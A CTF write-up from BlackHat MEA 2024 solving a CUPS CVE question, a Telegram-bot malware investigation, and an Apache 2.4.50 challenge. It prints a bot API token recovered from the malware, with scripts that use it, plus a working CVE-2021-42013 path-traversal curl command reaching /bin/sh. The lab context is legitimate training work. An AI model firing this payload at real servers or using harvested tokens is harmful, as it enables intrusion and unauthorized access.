Open in app

Sign in

Write

Sign in

Versos CTF Competition 2024

Dr.kasbr
4 min readDec 3, 2024

--

Hello Everyone….

This writeup covers all challenges in Versos CTF from the BlackHat MEA CTF 2024

The Print Revolution - Part 1 (Easy — 10pts)

==============================

so i start with ```whatweb```

This revealed the target server was running` CUPS/2.4.7` with the IPP/2.1 protocol, which pointed to the use of the Common UNIX Printing System (CUPS).

https://app.opencve.io/cve/?&vendor=openprinting&product=cups

https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cups

Next, I researched known vulnerabilities associated with CUPS 2.4.7 and found CVE-2024–47177. This CVE was a critical vulnerability in CUPS that allowed attackers to exploit issues with the IPP service to gain unauthorized access or manipulate print jobs. This could lead to the leakage of sensitive customer data, which aligned with the issue described in the challenge.

CVE-2024–47177 was the specific vulnerability responsible for the data breach in the scenario.

Flag ==CVE-2024–47177

The Infiltrated Notes - 1(Medium— 20pts)

==============================

Objective: The goal of this writeup is to document the investigation process and identify the Command-and-Control (C2) platform used by the hacker in the attack on TechSecure Inc.

so here is Python executable packe lets try extract it

i used https://github.com/extremecoders-re/pyinstxtractor

after that we can Decompile the .pyc files using PyLingual.io or other decompilers like uncompyle6.

so from here we know the flag for part 1

Part 1: Name the Command-and-Control (C2) platform used by the hacker.

flag==telegram

The Infiltrated Notes — 2(HARD— 30pts)

==============================

for the part 2 he want

Identify the hacker or threat actor responsible for the attack?

so lets back to the src code

in this case I have wasted a very long time trying to find some way to get to the username via telegram_user_id = 5740488052 but no resulte

then i got idea its bot telegram so ?

The Bot’s Commands:

  • The bot supports several commands that are typically used by hackers for data exfiltration or surveillance:
  • viewFile, listDir, downloadFile: These are likely for accessing files on the victim's machine.
  • screenshot, webcam, video: These commands indicate the hacker is capturing media from the victim's machine, including screenshots and webcam footage.

so the idea was check if the bot is live or

import telebot

# Bot API key and user ID
BOT_API_KEY = '7777928708:AAHBUCyAWn4CgbG70zypo3Dtbw7bomOFd20'
USER_ID = 5740488052

# Initialize bot
bot = telebot.TeleBot(BOT_API_KEY)

try:
    # Send /start command to the bot and check response
    response = bot.send_message(USER_ID, "/start")
    print("Bot is live and responded:", response.text)
except Exception as e:
    print(f"Error: {e}")


#PS C:\Users\Drkasbr> & C:/Users/Drkasbr/AppData/Local/Microsoft/WindowsApps/python3.9.exe c:/Users/Drkasbr/Desktop/ctf/fast/ciso/rev/solve.py
#Bot is live and responded: /start
#PS C:\Users\Drkasbr>

so now lets try add it to new group just to find the username

but when i was try find way to get the id of group i found this

Telegram Bot - how to get a group chat id?

I've been using telegram_bot, and trying to get groupChat id to send notifications to group chat, but don't know which…

stackoverflow.com

so i foget that we have the api key here the token we can do everthing
import requests

BOT_API_KEY = "7777928708:AAHBUCyAWn4CgbG70zypo3Dtbw7bomOFd20"
url = f"https://api.telegram.org/bot{BOT_API_KEY}/getMe"

response = requests.get(url)
if response.status_code == 200:
    print("Details:", response.json())
else:
    print("GG", response.status_code, response.text)

Details: {‘ok’: True, ‘result’: {‘id’: 7777928708, ‘is_bot’: True, ‘first_name’: ‘Dr_Strike’, ‘username’: ‘drstrike_bot’, ‘can_join_groups’: True, ‘can_read_all_group_messages’: False, ‘supports_inline_queries’: False, ‘can_connect_to_business’: False, ‘has_main_web_app’: False}}
PS C:\Users\Drkasbr>

soo the flag for

“Identify the hacker or threat actor responsible for the attack?”

flag==Dr_Strike

The RTR160CC (Medium — 20pts)

==============================

so its look like machine

i start with whatweb to find the server

┌──(oxfun㉿0xfun)-[~]
└─$ whatweb https://versos-ctf-rtr160cc.chals.io/   
https://versos-ctf-rtr160cc.chals.io/ [200 OK] Apache[2.4.50][Default], Country[UNITED STATES][US], HTTPServer[Unix][Apache/2.4.50 (Unix)], IP[143.244.222.116]
                                                                                                                       
┌──(oxfun㉿0xfun)-[~]
└─$

in this Version there is many CVES but we can use # CVE : CVE-2021–42013

or we can do it manual

curl 'https://versos-ctf-rtr160cc.chals.io/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; here is your command '

so the flag here will be

f8928e14ac40

Ctf
Ctf Writeup
Ctf Walkthrough

--

--

Dr.kasbr
Dr.kasbr

Written by Dr.kasbr

14 Followers
3 Following

Responses (1)